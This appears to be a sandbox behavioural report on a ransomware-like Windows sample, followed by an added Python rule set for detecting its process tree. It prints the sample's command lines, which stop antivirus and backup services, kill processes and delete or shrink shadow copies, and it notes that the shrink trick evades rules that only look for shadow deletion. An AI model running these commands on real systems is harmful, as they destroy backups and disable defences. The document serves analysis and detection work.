Analysis
max time kernel: 151s
max time network: 120s
platform: windows10_x64
resource: win10v20210408
submitted: 26-07-2021 12:40
Static task: static1
Behavioral task: behavioral1
  Sample: 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe
  Resource: win10v20210408
General
Target: 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe
Size: 61KB
MD5: 2a66b3b2638dfc5dfcf8aaf825993269
SHA1: 4e04822d6b8c3087be0550dba96f0c80d84359f8
SHA256: 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5
SHA512: 1d63645dc8564057367ed295cb56b0aebdb071b652786d67ae2d9fc0371a034231ace703001bc353b303000fde0c6f9774a120ace83b665964278f8e7127c435
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials. No IoCs are listed for this signature in the report.
- Enumerates connected drives (3 TTPs, 18 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive. Here every IoC comes from vssadmin.exe, which the sample points at D: through H: when resizing shadow storage (see the process tree below); the signature fires on those drive-root opens, not on a separate discovery routine.
  Processes: vssadmin.exe
  description               ioc      process
  File opened (read-only)   \??\D:   vssadmin.exe (2)
  File opened (read-only)   \??\E:   vssadmin.exe (2)
  File opened (read-only)   \??\e:   vssadmin.exe (2)
  File opened (read-only)   \??\F:   vssadmin.exe (2)
  File opened (read-only)   \??\f:   vssadmin.exe (2)
  File opened (read-only)   \??\G:   vssadmin.exe (2)
  File opened (read-only)   \??\g:   vssadmin.exe (2)
  File opened (read-only)   \??\H:   vssadmin.exe (2)
  File opened (read-only)   \??\h:   vssadmin.exe (2)
- Launches sc.exe
  sc.exe is a Windows utility to control services on the system.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Interacts with shadow copies (2 TTPs, 14 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery. The 14 vssadmin.exe invocations are two `Delete Shadows /all /quiet` calls plus a `resize shadowstorage` pair (`/maxsize=401MB`, then `/maxsize=unbounded`) for each of c: through h:. Shrinking shadow storage below the space the existing snapshots occupy makes VSS discard them, so the resize pair is a second deletion path that detection rules keyed only on `Delete Shadows` miss.
  Processes: vssadmin.exe (x14)
  pid   process
  3524  vssadmin.exe
  3176  vssadmin.exe
  228   vssadmin.exe
  3884  vssadmin.exe
  2532  vssadmin.exe
  3100  vssadmin.exe
  492   vssadmin.exe
  1184  vssadmin.exe
  4088  vssadmin.exe
  272   vssadmin.exe
  3220  vssadmin.exe
  3912  vssadmin.exe
  216   vssadmin.exe
  1204  vssadmin.exe
- Kills process with taskkill (3 IoCs)
  Processes: taskkill.exe (x3)
  pid   process
  3260  taskkill.exe
  2908  taskkill.exe
  2040  taskkill.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes: 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe
  All 64 entries are pid 604 (the sample process itself); none of the spawned child processes appears in this list.
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe, taskkill.exe (x3), vssvc.exe
  description                 pid   process
  Token: SeDebugPrivilege     604   10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe
  Token: SeDebugPrivilege     3260  taskkill.exe
  Token: SeDebugPrivilege     2908  taskkill.exe
  Token: SeDebugPrivilege     2040  taskkill.exe
  Token: SeBackupPrivilege    204   vssvc.exe
  Token: SeRestorePrivilege   204   vssvc.exe
  Token: SeAuditPrivilege     204   vssvc.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe (shown as sample.exe below), net.exe (x5)
  Every parent/child pair is recorded twice in the raw list, so the 64 IoCs are 32 distinct writes, each into a child the parent had just spawned (compare the process tree).
  pid   process      wrote to memory of   target process
  604   sample.exe   3132                 net.exe
  3132  net.exe      1708                 net1.exe
  604   sample.exe   3352                 net.exe
  3352  net.exe      3332                 net1.exe
  604   sample.exe   184                  net.exe
  184   net.exe      2340                 net1.exe
  604   sample.exe   1476                 net.exe
  1476  net.exe      3384                 net1.exe
  604   sample.exe   1580                 net.exe
  1580  net.exe      3468                 net1.exe
  604   sample.exe   2060                 sc.exe
  604   sample.exe   3904                 sc.exe
  604   sample.exe   2280                 sc.exe
  604   sample.exe   2180                 sc.exe
  604   sample.exe   3260                 taskkill.exe
  604   sample.exe   2908                 taskkill.exe
  604   sample.exe   2040                 taskkill.exe
  604   sample.exe   216                  vssadmin.exe
  604   sample.exe   1184                 vssadmin.exe
  604   sample.exe   1204                 vssadmin.exe
  604   sample.exe   3884                 vssadmin.exe
  604   sample.exe   4088                 vssadmin.exe
  604   sample.exe   3524                 vssadmin.exe
  604   sample.exe   3176                 vssadmin.exe
  604   sample.exe   228                  vssadmin.exe
  604   sample.exe   272                  vssadmin.exe
  604   sample.exe   2532                 vssadmin.exe
  604   sample.exe   3220                 vssadmin.exe
  604   sample.exe   3100                 vssadmin.exe
  604   sample.exe   3912                 vssadmin.exe
  604   sample.exe   492                  vssadmin.exe
  604   sample.exe   3520                 arp.exe
Processes (indented by depth in the tree; each entry is the image path, then its command line, then the signatures it triggered)

C:\Users\Admin\AppData\Local\Temp\10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\SYSTEM32\net.exe
    "net.exe" stop avpsus /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
  C:\Windows\SYSTEM32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
  C:\Windows\SYSTEM32\net.exe
    "net.exe" stop mfewc /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
  C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BMR Boot Service /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
  C:\Windows\SYSTEM32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
  C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
  C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLWriter start= disabled
  C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SstpSvc start= disabled
  C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" Delete Shadows /all /quiet
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    - Enumerates connected drives
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" Delete Shadows /all /quiet
    - Interacts with shadow copies
  C:\Windows\SYSTEM32\arp.exe
    "arp" -a
C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
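The Signatures and Processes sections above show one parent (pid 604) driving net stop, sc config, taskkill /F and vssadmin in sequence. The following is an added example, not part of the Triage report or of the sample: detection logic a SOC analyst could run over process-creation telemetry (Sysmon Event ID 1 or Security 4688, already parsed into parent pid, pid, image, command line) to catch that routine as a tree rather than as isolated commands. The EVENTS feed is constructed from this report's process tree plus one benign control I made up; the rule names, the technique mapping and the function names are my assumptions.

```python
"""Detection logic for the service-stop / shadow-copy routine in this report.

Added example, not part of the Triage report or of the sample: EVENTS is
constructed from the report's process tree (parent pid, pid, image, command
line) in the shape a parsed Sysmon Event ID 1 / Security 4688 stream would
have. Rule names, technique mapping and the benign control are assumptions.
"""
import re
from collections import defaultdict

SAMPLE = "10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe"

# (parent_pid, pid, image, command_line), taken from the process tree above.
EVENTS = [
    (0,    604,  SAMPLE,         f'"{SAMPLE}"'),
    (604,  3132, "net.exe",      '"net.exe" stop avpsus /y'),
    (3132, 1708, "net1.exe",     "net1 stop avpsus /y"),
    (604,  1580, "net.exe",      '"net.exe" stop NetBackup BMR MTFTP Service /y'),
    (604,  2060, "sc.exe",       '"sc.exe" config SQLTELEMETRY start= disabled'),
    (604,  2180, "sc.exe",       '"sc.exe" config SstpSvc start= disabled'),
    (604,  3260, "taskkill.exe", '"taskkill.exe" /IM mspub.exe /F'),
    (604,  216,  "vssadmin.exe", '"vssadmin.exe" Delete Shadows /all /quiet'),
    (604,  1184, "vssadmin.exe", '"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB'),
    (604,  1204, "vssadmin.exe", '"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded'),
    (604,  3520, "arp.exe",      '"arp" -a'),
    # Constructed benign control (not in the report): an admin growing shadow
    # storage from a console. It must not be flagged.
    (0,    900,  "cmd.exe",      "cmd.exe"),
    (900,  901,  "vssadmin.exe", "vssadmin resize shadowstorage /for=c: /on=c: /maxsize=20GB"),
]

# (label, ATT&CK technique, image pattern, command-line pattern); all matched
# case-insensitively. shadow_shrink fires only on small MB/KB caps, which is the
# trick the sample uses (401MB, then unbounded); growing storage to GB sizes is
# routine administration and stays quiet.
RULES = [
    ("shadow_delete",   "T1490 Inhibit System Recovery", r"vssadmin\.exe$", r"\bdelete\s+shadows\b"),
    ("shadow_shrink",   "T1490 Inhibit System Recovery", r"vssadmin\.exe$", r"\bresize\s+shadowstorage\b.*/maxsize=\d+(MB|KB)\b"),
    ("service_stop",    "T1489 Service Stop",            r"net1?\.exe$",    r"^\S+\s+stop\b"),
    ("service_disable", "T1489 Service Stop",            r"sc\.exe$",       r"\bconfig\b.*\bstart=\s*disabled\b"),
    ("process_kill",    "T1489 Service Stop",            r"taskkill\.exe$", r"/IM\b.*\s/F\b"),
]


def classify(image, cmdline):
    """Return the set of rule labels one process-creation record matches."""
    return {
        label
        for label, _tech, img_re, cmd_re in RULES
        if re.search(img_re, image, re.I) and re.search(cmd_re, cmdline, re.I)
    }


def build_parent_map(events):
    """pid -> parent pid for every record in the feed."""
    return {pid: ppid for ppid, pid, _image, _cmd in events}


def root_of(pid, parent):
    """Walk parent links up to the ancestor whose own parent is not in the feed."""
    while parent.get(pid) in parent:
        pid = parent[pid]
    return pid


def score_trees(events, min_labels=3):
    """Attribute every hit to its root ancestor; flag roots spanning >= min_labels categories.

    Each command on its own is a legitimate admin tool. The signal in this
    report is one parent (pid 604) driving all of them, so the score is kept
    per tree, not per process.
    """
    parent = build_parent_map(events)
    labels, hits = defaultdict(set), defaultdict(int)
    for _ppid, pid, image, cmdline in events:
        matched = classify(image, cmdline)
        if matched:
            root = root_of(pid, parent)
            labels[root] |= matched
            hits[root] += 1
    return {
        root: {"labels": sorted(labels[root]), "hits": hits[root],
               "flagged": len(labels[root]) >= min_labels}
        for root in labels
    }


if __name__ == "__main__":
    for root, verdict in score_trees(EVENTS).items():
        print(root, verdict)
```

On this feed only pid 604 is reported: eight hits across five categories, while the constructed cmd.exe tree that merely grows shadow storage produces no hit at all. Against real telemetry, key the tree on a stable process identifier (Sysmon's ProcessGuid) rather than the reusable pid, and add a time window, since the report gives no timestamps and the routine above runs within seconds.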
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/184-121-0x0000000000000000-mapping.dmp
memory/216-134-0x0000000000000000-mapping.dmp
memory/228-141-0x0000000000000000-mapping.dmp
memory/272-142-0x0000000000000000-mapping.dmp
memory/492-147-0x0000000000000000-mapping.dmp
memory/604-116-0x000000001BA90000-0x000000001BA92000-memory.dmp (8KB)
memory/604-114-0x0000000000EF0000-0x0000000000EF1000-memory.dmp (4KB)
memory/1184-135-0x0000000000000000-mapping.dmp
memory/1204-136-0x0000000000000000-mapping.dmp
memory/1476-123-0x0000000000000000-mapping.dmp
memory/1580-125-0x0000000000000000-mapping.dmp
memory/1708-118-0x0000000000000000-mapping.dmp
memory/2040-133-0x0000000000000000-mapping.dmp
memory/2060-127-0x0000000000000000-mapping.dmp
memory/2180-130-0x0000000000000000-mapping.dmp
memory/2280-129-0x0000000000000000-mapping.dmp
memory/2340-122-0x0000000000000000-mapping.dmp
memory/2532-143-0x0000000000000000-mapping.dmp
memory/2908-132-0x0000000000000000-mapping.dmp
memory/3100-145-0x0000000000000000-mapping.dmp
memory/3132-117-0x0000000000000000-mapping.dmp
memory/3176-140-0x0000000000000000-mapping.dmp
memory/3220-144-0x0000000000000000-mapping.dmp
memory/3260-131-0x0000000000000000-mapping.dmp
memory/3332-120-0x0000000000000000-mapping.dmp
memory/3352-119-0x0000000000000000-mapping.dmp
memory/3384-124-0x0000000000000000-mapping.dmp
memory/3468-126-0x0000000000000000-mapping.dmp
memory/3520-148-0x0000000000000000-mapping.dmp
memory/3524-139-0x0000000000000000-mapping.dmp
memory/3884-137-0x0000000000000000-mapping.dmp
memory/3904-128-0x0000000000000000-mapping.dmp
memory/3912-146-0x0000000000000000-mapping.dmp
memory/4088-138-0x0000000000000000-mapping.dmp